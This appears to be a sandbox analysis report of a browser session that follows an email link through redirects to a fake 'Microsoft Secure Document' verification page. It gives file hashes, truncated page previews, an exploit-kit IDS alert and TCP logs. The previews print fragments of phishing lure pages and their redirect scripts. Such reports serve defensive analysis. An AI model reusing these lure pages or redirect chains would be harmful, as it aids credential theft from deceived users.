                                                SSDEEP:6:pn0+Dy9xwGObRmEr6VnetdzRx3G0CezoFEHcLgabzjsKtgsg93wzRbKqD:J0+oxBeRmR9etdzRxGezZfCzjsKtgizR
                                                MD5:A34AC19F4AFAE63ADC5D2F7BC970C07F
                                                SHA1:A82190FC530C265AA40A045C21770D967F4767B8
                                                SHA-256:D5A89E26BEAE0BC03AD18A0B0D1D3D75F87C32047879D25DA11970CB5C4662A3
                                                SHA-512:42E53D96E5961E95B7A984D9C9778A1D3BD8EE0C87B8B3B515FA31F67C2D073C8565AFC2F4B962C43668C4EFA1E478DA9BB0ECFFA79479C7E880731BC4C55765
                                                Malicious:false
                                                Reputation:low
                                                URL:https://willpeltz.com/favicon.ico
                                                Preview:<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">.<html><head>.<title>404 Not Found</title>.</head><body>.<h1>Not Found</h1>.<p>The requested URL was not found on this server.</p>.<p>Additionally, a 404 Not Found.error was encountered while trying to use an ErrorDocument to handle the request.</p>.</body></html>.
                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                File Type:HTML document, ASCII text
                                                Category:downloaded
                                                Size (bytes):315
                                                Entropy (8bit):5.0572271090563765
                                                Encrypted:false
                                                SSDEEP:6:pn0+Dy9xwGObRmEr6VnetdzRx3G0CezoFEHcLgabzjsKtgsg93wzRbKqD:J0+oxBeRmR9etdzRxGezZfCzjsKtgizR
                                                MD5:A34AC19F4AFAE63ADC5D2F7BC970C07F
                                                SHA1:A82190FC530C265AA40A045C21770D967F4767B8
                                                SHA-256:D5A89E26BEAE0BC03AD18A0B0D1D3D75F87C32047879D25DA11970CB5C4662A3
                                                SHA-512:42E53D96E5961E95B7A984D9C9778A1D3BD8EE0C87B8B3B515FA31F67C2D073C8565AFC2F4B962C43668C4EFA1E478DA9BB0ECFFA79479C7E880731BC4C55765
                                                Malicious:false
                                                Reputation:low
                                                URL:https://riseandgain.com/favicon.ico
                                                Preview:<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">.<html><head>.<title>404 Not Found</title>.</head><body>.<h1>Not Found</h1>.<p>The requested URL was not found on this server.</p>.<p>Additionally, a 404 Not Found.error was encountered while trying to use an ErrorDocument to handle the request.</p>.</body></html>.
                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                File Type:HTML document, Unicode text, UTF-8 (with BOM) text, with very long lines (2809), with CRLF line terminators
                                                Category:downloaded
                                                Size (bytes):5918
                                                Entropy (8bit):5.754125404714814
                                                Encrypted:false
                                                SSDEEP:96:khXcF+UQj86gMBq+Zj36lwzrdl+WF+242hoS:MM6j1/q+Zj3nreVihoS
                                                MD5:2941892B6E75F1F280D927EAA607DC61
                                                SHA1:3922DB0669D5B7D3993B788E6D89FF8738242FAB
                                                SHA-256:C95277D6EC2ECE552C2D8C29F22D02A3FFB635C230BE68ABA893A6064363322B
                                                SHA-512:B4E5B722427CE3547A6587AB25D74DEA513B0B19DE328F7F5ABB6F6778322910E3FBAF08F27F7F13A7D9307D33861B86D1AC6ABF92C234C3C36485D124C9E997
                                                Malicious:false
                                                Reputation:low
                                                URL:https://riseandgain.com/
                                                Preview:.<html>.. <head>.. <meta name="viewport" content="width=device-width, initial-scale=1.0">.. <meta name="robots" content="noindex, nofollow">.. <script src="https://cdnjs.cloudflare.com/ajax/libs/crypto-js/4.0.0/crypto-js.min.js"></script>.. <script src="https://challenges.cloudflare.com/turnstile/v0/api.js"></script>.. <style>body, html {height: 100%;margin: 0;display: flex;align-items: center;justify-content: center;}@keyframes bounce {0%, 100%, 12.5%, 32.5%, 76.1% {transform: translateY(0);}22.5%, 86% {transform: translateY(7px);}}#yearly {height: 179px;width: 130px;overflow: hidden;margin-top: -59px;margin-left: 25px;}@keyframes shadow-fade {0%, 100%, 21.2%, 80% {opacity: 0;}47%, 70% {opacity: 1;}}#waggery {width: 130px;margin-top: 179px;}#gala {width: 130px;height: 71px;border-radius: 0 0 7px 7px;overflow: hidden;margin-top: -41px;}#gala>.ideally {width: 287px;height: 71px;background: #27a0e0;transform: translate(-153px, -70px) rotate(28deg);}#gala>.lace {width: 287px;height
                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                File Type:HTML document, ASCII text, with very long lines (442), with CRLF line terminators
                                                Category:dropped
                                                Size (bytes):6894
                                                Entropy (8bit):4.6875001543180055
                                                Encrypted:false
                                                SSDEEP:96:qSS2k0Nnlz/DTUKzHUXCM+xuK0OPWrHX66vDVQajLb:qSS8znTzHUh+xA5QajLb
                                                MD5:2528EBCF25C016EA533EDDF4F48E74A2
                                                SHA1:CDCBCCFDAF862DD254D2AA95BF74E74C059F6DBC
                                                SHA-256:2F7F83D3C583CD17010C5C3E86458091FEDC1FB89EC4C152FA3D3559103263DD
                                                SHA-512:372939F1B1FF1100900B56936E233996F87AF2FBEEFAF0B39B55C735D3AD7C640206352C675E51CCDA8941E89D47952C9C0899D51AF18D7606CAB9805E8B95AB
                                                Malicious:false
                                                Reputation:low
                                                Preview:<!DOCTYPE html>..<html lang="en">..<head>.. <meta charset="UTF-8">.. <meta name="viewport" content="width=device-width, initial-scale=1.0">.. <title>Classic Car Restorers - bestcomps.com.ru</title>.. <link href="https://cdn.jsdelivr.net/npm/bootstrap@5.0.2/dist/css/bootstrap.min.css" rel="stylesheet" integrity="sha384-EVSTQN3/azprG1Anm3QDgpJLIm9Nao0Yz1ztcQTwFspd3yD65VohhpuuCOmLASjC" crossorigin="anonymous">.. <style>.. body {.. padding-top: 56px;.. background-color: #f8f9fa;.. }.. .hero {.. background: url('https://th.bing.com/th/id/OIP.MjnVbz7Qpco9QkU3GkeI4gHaEK') no-repeat center center;.. background-size: cover;.. color: white;.. padding: 150px 0;.. text-align: center;.. }.. .content-section {.. padding: 60px 0;.. }.. .footer {.. background: #343a40;.. color: white;.. padding: 20px 0;.. tex
                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                File Type:ASCII text, with very long lines (65447)
                                                Category:downloaded
                                                Size (bytes):89501
                                                Entropy (8bit):5.289893677458563
                                                Encrypted:false
                                                SSDEEP:1536:DjExXUqJnxDjoXEZxkMV4QYSt0zvDL6gP3h8cApwEIOzVTB/UjPazMdLiX4mQ1v9:DIh8GgP3hujzwbhd3XvSiDQ47GKn
                                                MD5:8FB8FEE4FCC3CC86FF6C724154C49C42
                                                SHA1:B82D238D4E31FDF618BAE8AC11A6C812C03DD0D4
                                                SHA-256:FF1523FB7389539C84C65ABA19260648793BB4F5E29329D2EE8804BC37A3FE6E
                                                SHA-512:F3DE1813A4160F9239F4781938645E1589B876759CD50B7936DBD849A35C38FFAED53F6A61DBDD8A1CF43CF4A28AA9FFFBFDDEEC9A3811A1BB4EE6DF58652B31
                                                Malicious:false
                                                Reputation:low
                                                URL:https://code.jquery.com/jquery-3.6.0.min.js
                                                Preview:/*! jQuery v3.6.0 | (c) OpenJS Foundation and other contributors | jquery.org/license */.!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQuery requires a window with a document");return t(e)}:t(e)}("undefined"!=typeof window?window:this,function(C,e){"use strict";var t=[],r=Object.getPrototypeOf,s=t.slice,g=t.flat?function(e){return t.flat.call(e)}:function(e){return t.concat.apply([],e)},u=t.push,i=t.indexOf,n={},o=n.toString,v=n.hasOwnProperty,a=v.toString,l=a.call(Object),y={},m=function(e){return"function"==typeof e&&"number"!=typeof e.nodeType&&"function"!=typeof e.item},x=function(e){return null!=e&&e===e.window},E=C.document,c={type:!0,src:!0,nonce:!0,noModule:!0};function b(e,t,n){var r,i,o=(n=n||E).createElement("script");if(o.text=e,t)for(r in c)(i=t[r]||t.getAttribute&&t.getAttribute(r))&&o.setAttribute(r,i);n.head.appendChild(o).parentNode.removeChild(o)}funct
                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                File Type:ASCII text, with very long lines (65447)
                                                Category:dropped
                                                Size (bytes):89501
                                                Entropy (8bit):5.289893677458563
                                                Encrypted:false
                                                SSDEEP:1536:DjExXUqJnxDjoXEZxkMV4QYSt0zvDL6gP3h8cApwEIOzVTB/UjPazMdLiX4mQ1v9:DIh8GgP3hujzwbhd3XvSiDQ47GKn
                                                MD5:8FB8FEE4FCC3CC86FF6C724154C49C42
                                                SHA1:B82D238D4E31FDF618BAE8AC11A6C812C03DD0D4
                                                SHA-256:FF1523FB7389539C84C65ABA19260648793BB4F5E29329D2EE8804BC37A3FE6E
                                                SHA-512:F3DE1813A4160F9239F4781938645E1589B876759CD50B7936DBD849A35C38FFAED53F6A61DBDD8A1CF43CF4A28AA9FFFBFDDEEC9A3811A1BB4EE6DF58652B31
                                                Malicious:false
                                                Reputation:low
                                                Preview:/*! jQuery v3.6.0 | (c) OpenJS Foundation and other contributors | jquery.org/license */.!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQuery requires a window with a document");return t(e)}:t(e)}("undefined"!=typeof window?window:this,function(C,e){"use strict";var t=[],r=Object.getPrototypeOf,s=t.slice,g=t.flat?function(e){return t.flat.call(e)}:function(e){return t.concat.apply([],e)},u=t.push,i=t.indexOf,n={},o=n.toString,v=n.hasOwnProperty,a=v.toString,l=a.call(Object),y={},m=function(e){return"function"==typeof e&&"number"!=typeof e.nodeType&&"function"!=typeof e.item},x=function(e){return null!=e&&e===e.window},E=C.document,c={type:!0,src:!0,nonce:!0,noModule:!0};function b(e,t,n){var r,i,o=(n=n||E).createElement("script");if(o.text=e,t)for(r in c)(i=t[r]||t.getAttribute&&t.getAttribute(r))&&o.setAttribute(r,i);n.head.appendChild(o).parentNode.removeChild(o)}funct
                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                File Type:ASCII text, with very long lines (45034)
                                                Category:dropped
                                                Size (bytes):45035
                                                Entropy (8bit):5.400557193761079
                                                Encrypted:false
                                                SSDEEP:768:oCD98WxH5PbdrKAY+2HtedqdRQgFiIonqIjaEzY+iBggUydRm1TPjXk/bYjf+cd6:/xH5PbdrZkygk7qIjDgUjJY
                                                MD5:C4D5335B2B69C6998EE34F5F7B3E246F
                                                SHA1:AF0AE01ECCEE153877976D5C7D6500AA9C380B60
                                                SHA-256:7EDA47B0C02C44BDAA43A5B14857F1257DDBD620B0397C32AA3AE8BAF769AB55
                                                SHA-512:1C62C5D29C56848C258701F2E6B39E2152A3CACEB2C96F19ADB8542FDCC233F42BD0FAE9D03C8EA04F6B4490D0B69FD24F62B6D18A14A31D87E24906CFC88C58
                                                Malicious:false
                                                Reputation:low
                                                Preview:"use strict";(function(){function St(e,r,a,o,c,u,g){try{var _=e[u](g),p=_.value}catch(f){a(f);return}_.done?r(p):Promise.resolve(p).then(o,c)}function Ot(e){return function(){var r=this,a=arguments;return new Promise(function(o,c){var u=e.apply(r,a);function g(p){St(u,o,c,g,_,"next",p)}function _(p){St(u,o,c,g,_,"throw",p)}g(void 0)})}}function P(e,r){return r!=null&&typeof Symbol!="undefined"&&r[Symbol.hasInstance]?!!r[Symbol.hasInstance](e):P(e,r)}function Oe(e,r,a){return r in e?Object.defineProperty(e,r,{value:a,enumerable:!0,configurable:!0,writable:!0}):e[r]=a,e}function Ce(e){for(var r=1;r<arguments.length;r++){var a=arguments[r]!=null?arguments[r]:{},o=Object.keys(a);typeof Object.getOwnPropertySymbols=="function"&&(o=o.concat(Object.getOwnPropertySymbols(a).filter(function(c){return Object.getOwnPropertyDescriptor(a,c).enumerable}))),o.forEach(function(c){Oe(e,c,a[c])})}return e}function _r(e,r){var a=Object.keys(e);if(Object.getOwnPropertySymbols){var o=Object.getOwnPropertyS
                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                File Type:ASCII text, with very long lines (47992), with no line terminators
                                                Category:downloaded
                                                Size (bytes):47992
                                                Entropy (8bit):5.605846858683577
                                                Encrypted:false
                                                SSDEEP:768:LuxoaUN4+OIhwP53+e0QfA31jQM9OT81NHv4rnwfe:LuxoaU2+LwB2+G1ZdvCwfe
                                                MD5:CF3402D7483B127DED4069D651EA4A22
                                                SHA1:BDE186152457CACF9C35477B5BDDA5BCB56B1F45
                                                SHA-256:EAB5D90A71736F267AF39FDF32CAA8C71673FD06703279B01E0F92B0D7BE0BFC
                                                SHA-512:9CE42EBC3F672A2AEFC4376F43D38CA9ED9D81AA5B3C1EEF60032BCC98A1C399BE68D71FD1D5F9DE6E98C4CE0B800F6EF1EF5E83D417FBFFA63EEF2408DA55D8
                                                Malicious:false
                                                Reputation:low
                                                URL:https://cdnjs.cloudflare.com/ajax/libs/crypto-js/4.0.0/crypto-js.min.js
                                                Preview:!function(t,e){"object"==typeof exports?module.exports=exports=e():"function"==typeof define&&define.amd?define([],e):t.CryptoJS=e()}(this,function(){var h,t,e,r,i,n,f,o,s,c,a,l,d,m,x,b,H,z,A,u,p,_,v,y,g,B,w,k,S,C,D,E,R,M,F,P,W,O,I,U,K,X,L,j,N,T,q,Z,V,G,J,$,Q,Y,tt,et,rt,it,nt,ot,st,ct,at,ht,lt,ft,dt,ut,pt,_t,vt,yt,gt,Bt,wt,kt,St,bt=bt||function(l){var t;if("undefined"!=typeof window&&window.crypto&&(t=window.crypto),!t&&"undefined"!=typeof window&&window.msCrypto&&(t=window.msCrypto),!t&&"undefined"!=typeof global&&global.crypto&&(t=global.crypto),!t&&"function"==typeof require)try{t=require("crypto")}catch(t){}function i(){if(t){if("function"==typeof t.getRandomValues)try{return t.getRandomValues(new Uint32Array(1))[0]}catch(t){}if("function"==typeof t.randomBytes)try{return t.randomBytes(4).readInt32LE()}catch(t){}}throw new Error("Native crypto module could not be used to get secure random number.")}var r=Object.create||function(t){var e;return n.prototype=t,e=new n,n.prototype=null
                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                File Type:PNG image data, 28 x 55, 8-bit/color RGB, non-interlaced
                                                Category:downloaded
                                                Size (bytes):61
                                                Entropy (8bit):4.035372245524405
                                                Encrypted:false
                                                SSDEEP:3:yionv//thPlhIttrYR6yxl/k4E08up:6v/lhPkttMMy7Tp
                                                MD5:5945B8BCB616FCE19F086538D0B2145D
                                                SHA1:427EAA1C0438FF29608B319E24946B950EC6CE49
                                                SHA-256:2A0FE76FFCAE59089D25F51457B4548B4CFEF1C137CFAD8B630049A64DB7B707
                                                SHA-512:BFFE39B9BF645BAC2BC0F7BF3E17E85187D215F26EF2BCA124901CE033F9523EE900AF24BE04800DBE11C40153F14662798381D9B41DE7E0B6B4C31B6D64057E
                                                Malicious:false
                                                Reputation:low
                                                URL:https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/i/8b62cdd32d9718b1/1724161320643/HVxKxYYx_BryrmK
                                                Preview:.PNG........IHDR.......7........6....IDAT.....$.....IEND.B`.
                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                File Type:ASCII text, with very long lines (47992), with no line terminators
                                                Category:dropped
                                                Size (bytes):47992
                                                Entropy (8bit):5.605846858683577
                                                Encrypted:false
                                                SSDEEP:768:LuxoaUN4+OIhwP53+e0QfA31jQM9OT81NHv4rnwfe:LuxoaU2+LwB2+G1ZdvCwfe
                                                MD5:CF3402D7483B127DED4069D651EA4A22
                                                SHA1:BDE186152457CACF9C35477B5BDDA5BCB56B1F45
                                                SHA-256:EAB5D90A71736F267AF39FDF32CAA8C71673FD06703279B01E0F92B0D7BE0BFC
                                                SHA-512:9CE42EBC3F672A2AEFC4376F43D38CA9ED9D81AA5B3C1EEF60032BCC98A1C399BE68D71FD1D5F9DE6E98C4CE0B800F6EF1EF5E83D417FBFFA63EEF2408DA55D8
                                                Malicious:false
                                                Reputation:low
                                                Preview:!function(t,e){"object"==typeof exports?module.exports=exports=e():"function"==typeof define&&define.amd?define([],e):t.CryptoJS=e()}(this,function(){var h,t,e,r,i,n,f,o,s,c,a,l,d,m,x,b,H,z,A,u,p,_,v,y,g,B,w,k,S,C,D,E,R,M,F,P,W,O,I,U,K,X,L,j,N,T,q,Z,V,G,J,$,Q,Y,tt,et,rt,it,nt,ot,st,ct,at,ht,lt,ft,dt,ut,pt,_t,vt,yt,gt,Bt,wt,kt,St,bt=bt||function(l){var t;if("undefined"!=typeof window&&window.crypto&&(t=window.crypto),!t&&"undefined"!=typeof window&&window.msCrypto&&(t=window.msCrypto),!t&&"undefined"!=typeof global&&global.crypto&&(t=global.crypto),!t&&"function"==typeof require)try{t=require("crypto")}catch(t){}function i(){if(t){if("function"==typeof t.getRandomValues)try{return t.getRandomValues(new Uint32Array(1))[0]}catch(t){}if("function"==typeof t.randomBytes)try{return t.randomBytes(4).readInt32LE()}catch(t){}}throw new Error("Native crypto module could not be used to get secure random number.")}var r=Object.create||function(t){var e;return n.prototype=t,e=new n,n.prototype=null
                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                File Type:PNG image data, 2 x 2, 8-bit/color RGB, non-interlaced
                                                Category:downloaded
                                                Size (bytes):61
                                                Entropy (8bit):3.990210155325004
                                                Encrypted:false
                                                SSDEEP:3:yionv//thPltV/CI7syxl/k4E08up:6v/lhPgI17Tp
                                                MD5:9246CCA8FC3C00F50035F28E9F6B7F7D
                                                SHA1:3AA538440F70873B574F40CD793060F53EC17A5D
                                                SHA-256:C07D7D29E3C20FA6CA4C5D20663688D52BAD13E129AD82CE06B80EB187D9DC84
                                                SHA-512:A2098304D541DF4C71CDE98E4C4A8FB1746D7EB9677CEBA4B19FF522EFDD981E484224479FD882809196B854DBC5B129962DBA76198D34AAECF7318BD3736C6B
                                                Malicious:false
                                                Reputation:low
                                                URL:https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/cmg/1/wh0E0SXYnx6pTBdJW%2Fl926I%2BPRUplRdtQz3K9lHXs%2Fs%3D
                                                Preview:.PNG........IHDR...............s....IDAT.....$.....IEND.B`.
                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                File Type:ASCII text, with very long lines (45034)
                                                Category:downloaded
                                                Size (bytes):45035
                                                Entropy (8bit):5.400557193761079
                                                Encrypted:false
                                                SSDEEP:768:oCD98WxH5PbdrKAY+2HtedqdRQgFiIonqIjaEzY+iBggUydRm1TPjXk/bYjf+cd6:/xH5PbdrZkygk7qIjDgUjJY
                                                MD5:C4D5335B2B69C6998EE34F5F7B3E246F
                                                SHA1:AF0AE01ECCEE153877976D5C7D6500AA9C380B60
                                                SHA-256:7EDA47B0C02C44BDAA43A5B14857F1257DDBD620B0397C32AA3AE8BAF769AB55
                                                SHA-512:1C62C5D29C56848C258701F2E6B39E2152A3CACEB2C96F19ADB8542FDCC233F42BD0FAE9D03C8EA04F6B4490D0B69FD24F62B6D18A14A31D87E24906CFC88C58
                                                Malicious:false
                                                Reputation:low
                                                URL:https://challenges.cloudflare.com/turnstile/v0/b/6790c32b9fc9/api.js
                                                Preview:"use strict";(function(){function St(e,r,a,o,c,u,g){try{var _=e[u](g),p=_.value}catch(f){a(f);return}_.done?r(p):Promise.resolve(p).then(o,c)}function Ot(e){return function(){var r=this,a=arguments;return new Promise(function(o,c){var u=e.apply(r,a);function g(p){St(u,o,c,g,_,"next",p)}function _(p){St(u,o,c,g,_,"throw",p)}g(void 0)})}}function P(e,r){return r!=null&&typeof Symbol!="undefined"&&r[Symbol.hasInstance]?!!r[Symbol.hasInstance](e):P(e,r)}function Oe(e,r,a){return r in e?Object.defineProperty(e,r,{value:a,enumerable:!0,configurable:!0,writable:!0}):e[r]=a,e}function Ce(e){for(var r=1;r<arguments.length;r++){var a=arguments[r]!=null?arguments[r]:{},o=Object.keys(a);typeof Object.getOwnPropertySymbols=="function"&&(o=o.concat(Object.getOwnPropertySymbols(a).filter(function(c){return Object.getOwnPropertyDescriptor(a,c).enumerable}))),o.forEach(function(c){Oe(e,c,a[c])})}return e}function _r(e,r){var a=Object.keys(e);if(Object.getOwnPropertySymbols){var o=Object.getOwnPropertyS
                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                File Type:PNG image data, 2 x 2, 8-bit/color RGB, non-interlaced
                                                Category:dropped
                                                Size (bytes):61
                                                Entropy (8bit):3.990210155325004
                                                Encrypted:false
                                                SSDEEP:3:yionv//thPltV/CI7syxl/k4E08up:6v/lhPgI17Tp
                                                MD5:9246CCA8FC3C00F50035F28E9F6B7F7D
                                                SHA1:3AA538440F70873B574F40CD793060F53EC17A5D
                                                SHA-256:C07D7D29E3C20FA6CA4C5D20663688D52BAD13E129AD82CE06B80EB187D9DC84
                                                SHA-512:A2098304D541DF4C71CDE98E4C4A8FB1746D7EB9677CEBA4B19FF522EFDD981E484224479FD882809196B854DBC5B129962DBA76198D34AAECF7318BD3736C6B
                                                Malicious:false
                                                Reputation:low
                                                Preview:.PNG........IHDR...............s....IDAT.....$.....IEND.B`.
                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                File Type:HTML document, ASCII text, with very long lines (512)
                                                Category:downloaded
                                                Size (bytes):2428
                                                Entropy (8bit):5.2049229829267105
                                                Encrypted:false
                                                SSDEEP:48:gmJTXIbrUqckZNrUczx+x2Sngg2bkEe9w0NW:gIT4bAqckZNr/XbYrW
                                                MD5:AE889A4237F2F8BA7859FDC2C95EAF76
                                                SHA1:591185F4842F597332AA11A25ECB28C9D11E1D21
                                                SHA-256:ABF90C7A98260CD808339339B9EA0ABF3EB8FDA723C405786EFBE7DA92D2DE44
                                                SHA-512:BA5A997B048FF97692FABA93AE77229B5E486E4DFA01DA99CFA9DE7BE9A014C3FE4ECBE3185529823EA088D2F6B6F655F1A9DFED1ACABD9C58F634FD05A3DA20
                                                Malicious:false
                                                Reputation:low
                                                URL:https://sibautomation.com/cm.html?id=8031197
                                                Preview:<!DOCTYPE html>.<html>.<head>.<script type="text/javascript">. function uuidV4() { var d = new Date().getTime(); return 'xxxxxxxx-xxxx-4xxx-yxxx-xxxxxxxxxxxx'.replace(/[xy]/g, function(c){ var r = (d + Math.random() * 16) % 16 | 0; d = Math.floor(d / 16); return (c == 'x' ? r : (r & 0x3 | 0x8)).toString(16);});}. function rq_send(d, cb) {var l = 'https://in-automate.brevo.com/cm?' + qs_encode(d), x = new XMLHttpRequest(); x.open("GET", l, true); x.onreadystatechange = function() { if (x.readyState == XMLHttpRequest.DONE && x.status == 204) { cb && cb(null, this.response);}}; x.send(null);}. function ck_set(n, v, y) { var d = new Date(); d.setHours(182 * 24); var e = "; expires=" + d.toGMTString(); document.cookie = n + "=" + v + e + ";path=/;Secure;SameSite=None";}. function ck_get(n) { var cn = n + "=", ca = document.cookie.split(';'); for (var i = 0; i < ca.length; i++) { var c = ca[i]; while (c.charAt(0) == ' ') c = c.substring(1, c.length); if (c.indexOf(cn) == 0) retur
                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                File Type:HTML document, ASCII text
                                                Category:downloaded
                                                Size (bytes):581
                                                Entropy (8bit):5.137943898823857
                                                Encrypted:false
                                                SSDEEP:12:hYFCyXMxiWmNI1pMoo6JW2ykRRyXrkJdW1SQiEZjTdzW1Seu4NGb:hYM6MxiWE0pMou2ykRoXQJd9Qi8jTdzz
                                                MD5:C07179E6E16FA399EDC15F0795A3BB8A
                                                SHA1:91DFBE303459DE6E67A677DD0658005D070FEA1D
                                                SHA-256:3FE2BC77C7202FB3C7709DFD27210474AE6658CD9AE4EEF948F04766597EC6A1
                                                SHA-512:C76EF1A052F83517636DA402B91BDA39AFACFB0443C5843B4C46BFE658CAEBB6505124204D4F135199EFEA419A3F65A430CB94BB253547C597EDD3B96B24089C
                                                Malicious:false
                                                Reputation:low
                                                URL:https://e9dj7.r.ag.d.sendibm3.com/mk/cl/f/sh/OycZvHuFo1eQsnbcKLZKIDEG/cgVcrWmaXXkf
                                                Preview:<!DOCTYPE html>.<html>..<head>...<title>Redirection</title>..</head>..<body>...<noscript>... <meta http-equiv="refresh" content="0.0;https://willpeltz.com/">...</noscript>. <iframe src="https://sibautomation.com/cm.html?id=8031197#trans=0&amp;user_id=1" onload="automationOnload()" style="display:none;"></iframe>..</body>..<script>.. var autoRedirectTimeout = setTimeout(function(){ top.location='https:\/\/willpeltz.com\/' }, 3000)...function automationOnload(){....clearTimeout(autoRedirectTimeout)....top.location='https:\/\/willpeltz.com\/'...}..</script>.</html>
                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                File Type:PNG image data, 28 x 55, 8-bit/color RGB, non-interlaced
                                                Category:dropped
                                                Size (bytes):61
                                                Entropy (8bit):4.035372245524405
                                                Encrypted:false
                                                SSDEEP:3:yionv//thPlhIttrYR6yxl/k4E08up:6v/lhPkttMMy7Tp
                                                MD5:5945B8BCB616FCE19F086538D0B2145D
                                                SHA1:427EAA1C0438FF29608B319E24946B950EC6CE49
                                                SHA-256:2A0FE76FFCAE59089D25F51457B4548B4CFEF1C137CFAD8B630049A64DB7B707
                                                SHA-512:BFFE39B9BF645BAC2BC0F7BF3E17E85187D215F26EF2BCA124901CE033F9523EE900AF24BE04800DBE11C40153F14662798381D9B41DE7E0B6B4C31B6D64057E
                                                Malicious:false
                                                Reputation:low
                                                Preview:.PNG........IHDR.......7........6....IDAT.....$.....IEND.B`.
                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                File Type:HTML document, ASCII text, with CRLF line terminators
                                                Category:downloaded
                                                Size (bytes):368
                                                Entropy (8bit):4.670140371315847
                                                Encrypted:false
                                                SSDEEP:6:h4QzhqIKAEtSKYkUqJ+U0Mf7fSw9vrQTeF0JkRnqGmmBxUxMtrMWXfGu:hPEhkAr+ULf7fRNsTadPx4xerMWPGu
                                                MD5:0FECC859D58B8DDB38C1B7E165DF1F02
                                                SHA1:E7315B3EE098BFDE79D2A58B8C6829AEC1DDA392
                                                SHA-256:B48C8309B76F25C2CC0391A4CB3063FA1AFAF46B63EC7946BC78B13908BE72DD
                                                SHA-512:42A0B3F2A4E2CC630F3EB6C14DA729CF49C06CD7726ED27B06DCDF02409D78E91FC6023358C9955FE63C5415B8E3267A4AE3BAACA55E48B29BABE14551FDD8A0
                                                Malicious:false
                                                Reputation:low
                                                URL:https://willpeltz.com/5069167943.php
                                                Preview:<!DOCTYPE html>..<html lang="en">..<head>.. <meta charset="UTF-8">.. <title>Welcome to Office</title>..</head>..<body>.. <script>.. .. var decodedUrl = "https://career4vets.com/new/rocky.php";.. .. setTimeout(function() {.. window.location.href = decodedUrl;.. }, 1000);.. </script>..</body>..</html>..
                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                File Type:HTML document, Unicode text, UTF-8 text, with very long lines (401), with CRLF line terminators
                                                Category:downloaded
                                                Size (bytes):7239
                                                Entropy (8bit):4.559368155393939
                                                Encrypted:false
                                                SSDEEP:96:rnadznjbz9WOQOLG9MPDqHHvdaM2sdhtT73t9UBK9:rWzj1BQ6G9MPQPb2cL3wBK9
                                                MD5:7DD807084C83E4CFE281521A50B8676C
                                                SHA1:3AC52243A4BAA970427367710004803DC68B134B
                                                SHA-256:8137E776FFD8705989ADE8C48D37002460E1A72D2B36D5A15A83CA3C6142DD89
                                                SHA-512:BB8A1DDDE06D33646412397504C94E686178E3FFA30DE463F73BCBC07A4AD58DC76EFF93E7F9E6CAC2110FEFD491D1912C537C9E9B8BFDB89B8E665AA38C06BC
                                                Malicious:false
                                                Reputation:low
                                                URL:https://willpeltz.com/
                                                Preview:....<!DOCTYPE html>..<html lang="en">..<head>.. <meta charset="UTF-8">.. <meta name="viewport" content="width=device-width, initial-scale=1.0">.. <meta http-equiv="X-UA-Compatible" content="IE=edge">.. <meta http-equiv="Content-Security-Policy" content="default-src 'self'; script-src 'self' 'unsafe-inline'; style-src 'self' 'unsafe-inline'; img-src 'self' data:; font-src 'self'; frame-src 'none'; object-src 'none';">.. <meta name="referrer" content="no-referrer">.. <meta name="description" content="Verify your identity to access Microsoft Secure Document">.. <title>Microsoft Secure Document - Verification</title>.. <style>.. body {.. font-family: 'Roboto', Arial, sans-serif;.. text-align: center;.. margin: 0;.. padding: 0;.. display: flex;.. flex-direction: column;.. justify-content: center;.. min-height: 100vh;.. background: linear-gradient(135deg, #f8f9fa
                                                No static file info
                                                TimestampProtocolSIDSignatureSeveritySource PortDest PortSource IPDest IP
                                                2024-08-20T15:40:52.839731+0200TCP2022112ET EXPLOIT_KIT Possible Nuclear EK Landing Nov 17 2015149715443192.168.2.16104.18.7.69
                                                TimestampSource PortDest PortSource IPDest IP
                                                Aug 20, 2024 15:40:48.335144043 CEST49708443192.168.2.163.165.113.82
                                                Aug 20, 2024 15:40:48.335194111 CEST443497083.165.113.82192.168.2.16
                                                Aug 20, 2024 15:40:48.335267067 CEST49708443192.168.2.163.165.113.82
                                                Aug 20, 2024 15:40:48.335483074 CEST49708443192.168.2.163.165.113.82
                                                Aug 20, 2024 15:40:48.335498095 CEST443497083.165.113.82192.168.2.16
                                                Aug 20, 2024 15:40:48.335799932 CEST49709443192.168.2.163.165.113.82
                                                Aug 20, 2024 15:40:48.335838079 CEST443497093.165.113.82192.168.2.16
                                                Aug 20, 2024 15:40:48.335895061 CEST49709443192.168.2.163.165.113.82
                                                Aug 20, 2024 15:40:48.336066961 CEST49709443192.168.2.163.165.113.82
                                                Aug 20, 2024 15:40:48.336078882 CEST443497093.165.113.82192.168.2.16
                                                Aug 20, 2024 15:40:48.381179094 CEST49673443192.168.2.16204.79.197.203
                                                Aug 20, 2024 15:40:48.683706045 CEST49673443192.168.2.16204.79.197.203
                                                Aug 20, 2024 15:40:49.167846918 CEST443497093.165.113.82192.168.2.16
                                                Aug 20, 2024 15:40:49.167936087 CEST443497083.165.113.82192.168.2.16
                                                Aug 20, 2024 15:40:49.168114901 CEST49709443192.168.2.163.165.113.82
